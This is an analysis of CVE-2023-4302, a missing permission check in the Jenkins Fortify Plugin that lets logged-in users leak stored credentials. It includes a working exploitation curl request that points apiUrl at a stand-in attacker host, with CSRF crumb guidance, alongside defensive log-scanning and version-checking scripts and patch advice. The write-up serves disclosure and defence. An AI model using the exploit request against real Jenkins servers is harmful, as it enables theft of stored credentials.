CVE-2023-4302 Exploit Analysis: Unauthorized Access to Jenkins Fortify Plugin Credentials

The Jenkins Fortify Plugin is affected by CVE-2023-4302, a missing permission check that allows attackers with Overall/Read permission to capture credentials stored in Jenkins. This article analyses the flaw, with code snippets, references and exploitation details.

Overview of the Vulnerability

Fortify Plugin 22.1.38 and earlier is missing a permission check on one of its form-validation endpoints. An attacker with Overall/Read permission on Jenkins (the baseline permission held by every account that can log in) can make Jenkins connect to an attacker-specified URL using a credentials ID obtained through another method. Because the plugin authenticates to that URL with the stored credential, the attacker's server captures it.

The following simplified snippet shows the shape of the vulnerable form-validation method in the affected versions; the missing permission check is the entry point:

import java.io.IOException;
import javax.servlet.ServletException;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;

// Stapler exposes every public do* method of a Descriptor as an HTTP endpoint under
// /descriptorByName/<class>/doTestConnection, so this is reachable by any user who
// can log in unless the method checks permissions itself.
public FormValidation doTestConnection(
        @QueryParameter String apiUrl,
        @QueryParameter String credentialsId,
        @QueryParameter String clientId,
        @QueryParameter String clientSecret,
        @QueryParameter String fortifyEnvironment)
        throws IOException, ServletException {
    // Missing permission check here
    // Expected permission check: Jenkins.get().checkPermission(Jenkins.ADMINISTER);

    // Rest of the code: resolves credentialsId to a stored credential and
    // uses it to contact apiUrl
}

As the snippet shows, the permission check Jenkins.get().checkPermission(Jenkins.ADMINISTER) has been omitted, so any user with Overall/Read can invoke the method and choose both the target URL and the credentials ID. Jenkins' developer guidelines call for such form-validation methods to both check the appropriate permission and be restricted to POST requests.

To exploit this vulnerability, an attacker can follow these steps:

1. Obtain a credentials ID through another technique, for example from a readable job or pipeline definition that references it, through social engineering, or through another vulnerability within Jenkins. The ID itself is not secret; it only names the stored credential.

2. With the captured credentials ID, call the unprotected endpoint with apiUrl set to a server the attacker controls. Jenkins resolves the credentials ID and authenticates to that URL, so the attacker's server records the credential. An example request, using a session for any account with Overall/Read:

curl -X POST \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --cookie 'JSESSIONID=<your-session-id>' \
    --data 'apiUrl=https://attacker-url.com&credentialsId=CAPTURED-CREDENTIAL-ID&clientId=&clientSecret=' \
    'https://jenkins.example.com/descriptorByName/io.jenkins.plugins.fortify.cloud.FortifyConfig$DescriptorImpl/doTestConnection'

A POST to Jenkins normally also requires a CSRF crumb, obtained from /crumbIssuer/api/json and sent in the Jenkins-Crumb header alongside the session cookie.

3. Upon successful exploitation, the attacker's server receives whatever the plugin sends to authenticate: the credential resolved from the ID, such as an API token or a username and password, that the attacker was never authorized to read.
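As an added detection example (not code from this page, from Jenkins or from the Fortify plugin project), the following Python script scans Jenkins HTTP access-log lines in NCSA combined format and flags calls to the doTestConnection endpoint that come from non-administrators, arrive as GET rather than POST, or carry an apiUrl pointing outside an allow-list of known Fortify hosts. The log lines are constructed, and the descriptor class name, the assumption that the access log records the Jenkins user name in the remote-user field, the administrator set and the allowed host are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in NCSA combined format (not real Jenkins logs).
# Whether the third field carries the Jenkins user name depends on how the
# access logger is configured; this example assumes it does.
SAMPLE_LOG = """\
10.0.0.5 - alice [21/Aug/2023:10:01:12 +0000] "GET /job/build-app/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - alice [21/Aug/2023:10:02:40 +0000] "POST /descriptorByName/io.jenkins.plugins.fortify.cloud.FortifyConfig$DescriptorImpl/doTestConnection HTTP/1.1" 200 64 "-" "curl/8.1.2"
10.0.0.9 - admin [21/Aug/2023:10:05:03 +0000] "POST /descriptorByName/io.jenkins.plugins.fortify.cloud.FortifyConfig$DescriptorImpl/doTestConnection HTTP/1.1" 200 64 "https://jenkins.example.com/configure" "Mozilla/5.0"
10.0.0.7 - bob [21/Aug/2023:10:06:55 +0000] "GET /descriptorByName/io.jenkins.plugins.fortify.cloud.FortifyConfig$DescriptorImpl/doTestConnection?apiUrl=https%3A%2F%2Fattacker-url.com%2Fssc&credentialsId=ssc-token HTTP/1.1" 200 64 "-" "python-requests/2.31"
"""

# One NCSA combined log line: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# The Fortify descriptor endpoint named on this page; the exact class name is
# an assumption, so any Fortify descriptor's doTestConnection is matched.
ENDPOINT_RE = re.compile(r'/descriptorByName/[^/]*fortify[^/]*/doTestConnection$')


def flag_test_connection(log_text, admin_users, allowed_hosts):
    """Return a list of findings for suspicious doTestConnection requests.

    A request is flagged when the caller is not an administrator, when it is
    not a POST (a browser form validation is always a POST), or when the
    apiUrl query parameter, if present, names a host outside allowed_hosts.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real collector would count these
        parts = urlsplit(m['target'])
        if not ENDPOINT_RE.search(parts.path):
            continue
        reasons = []
        if m['user'] not in admin_users:
            reasons.append('caller %s is not an administrator' % m['user'])
        if m['method'] != 'POST':
            reasons.append('non-POST request, consistent with a scripted or cross-site call')
        api_url = parse_qs(parts.query).get('apiUrl', [None])[0]
        if api_url:
            host = urlsplit(api_url).hostname
            if host not in allowed_hosts:
                reasons.append('apiUrl points at unexpected host %s' % host)
        if reasons:
            findings.append({
                'time': m['time'], 'ip': m['ip'], 'user': m['user'],
                'method': m['method'], 'reasons': reasons,
            })
    return findings


if __name__ == '__main__':
    # Assumed administrator account and assumed legitimate Fortify host.
    for hit in flag_test_connection(SAMPLE_LOG, {'admin'}, {'ssc.example.com'}):
        print(hit['time'], hit['ip'], hit['user'], hit['method'])
        for reason in hit['reasons']:
            print('   -', reason)
```

The POST body of a genuine exploit attempt is not written to the access log, so the apiUrl check only fires for GET requests with the parameters in the query string; the non-administrator check is the one that catches the POST case described above.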

Mitigation Strategies

The vulnerability has been addressed in Fortify Plugin version 22.1.39. Updating to that release or later is the fix; the plugin can be updated from the Jenkins plugin management page, after which Jenkins must be restarted for the new version to take effect.
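An added example (not code from this page, from Jenkins or from the Fortify plugin project): a Python check that reads plugin-manager output and reports whether the installed Fortify plugin predates the fixed release. The JSON below is constructed in the shape returned by /pluginManager/api/json?depth=1&tree=plugins[shortName,version,active]; the plugin ID "fortify" and the fixed version 22.1.39 are assumptions, the former from the plugin's ID on plugins.jenkins.io and the latter from this page.

```python
import json
import re

# Constructed response shaped like Jenkins' plugin-manager API output; the
# plugin list and versions are invented for this example.
SAMPLE_PLUGIN_JSON = json.dumps({
    "plugins": [
        {"shortName": "credentials", "version": "1271.v54b_1c2c6388a_", "active": True},
        {"shortName": "fortify", "version": "22.1.38", "active": True},
        {"shortName": "git", "version": "5.2.0", "active": True},
    ]
})

PLUGIN_ID = "fortify"        # assumed plugin ID of the Fortify plugin
FIXED_VERSION = "22.1.39"    # fixed release as stated on this page


def version_key(version):
    """Split a plugin version into comparable parts.

    Numeric pieces compare as integers; anything else (for example the
    'v54b_...' suffixes of newer Jenkins plugin versions) compares as a string
    and sorts after numeric pieces, so mixed comparisons never raise.
    """
    parts = []
    for piece in re.split(r'[.\-]', version):
        parts.append((0, int(piece)) if piece.isdigit() else (1, piece))
    return parts


def fortify_status(plugin_json, fixed=FIXED_VERSION, short_name=PLUGIN_ID):
    """Return (installed_version, status) for the Fortify plugin.

    status is one of 'not installed', 'disabled', 'vulnerable' or 'fixed'.
    A disabled plugin is reported separately because its classes are not
    loaded and so its descriptor endpoints are not registered.
    """
    for plugin in json.loads(plugin_json).get("plugins", []):
        if plugin.get("shortName") != short_name:
            continue
        installed = plugin.get("version", "")
        if not plugin.get("active", True):
            return installed, "disabled"
        if version_key(installed) < version_key(fixed):
            return installed, "vulnerable"
        return installed, "fixed"
    return None, "not installed"


if __name__ == "__main__":
    # Replace SAMPLE_PLUGIN_JSON with the output of:
    #   curl -u USER:API_TOKEN \
    #     'https://jenkins.example.com/pluginManager/api/json?depth=1&tree=plugins[shortName,version,active]'
    installed, status = fortify_status(SAMPLE_PLUGIN_JSON)
    print("Fortify plugin %s: %s (fixed in %s)" % (installed, status, FIXED_VERSION))
```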

Additionally, because Overall/Read is held by every account that can log in, organizations should apply least privilege to their Jenkins permission model: restrict who can authenticate at all, grant Overall/Read only to accounts that need it, and share stored credentials no more broadly than necessary so that a single exposed form-validation endpoint cannot reach them.

For more details on this vulnerability, consult the following resources:

- CVE-2023-4302 Official Entry
- Fortify Plugin Changelog
- Jenkins Security Advisory

In conclusion, CVE-2023-4302 in the Jenkins Fortify Plugin gives any logged-in attacker a viable route to stored credentials. Prompt patching, a least-privilege permission model and monitoring of form-validation endpoints are the measures that prevent vulnerabilities like this from exposing sensitive data.

Timeline

Published on: 08/21/2023 23:15:00 UTC
Last modified on: 08/24/2023 21:36:00 UTC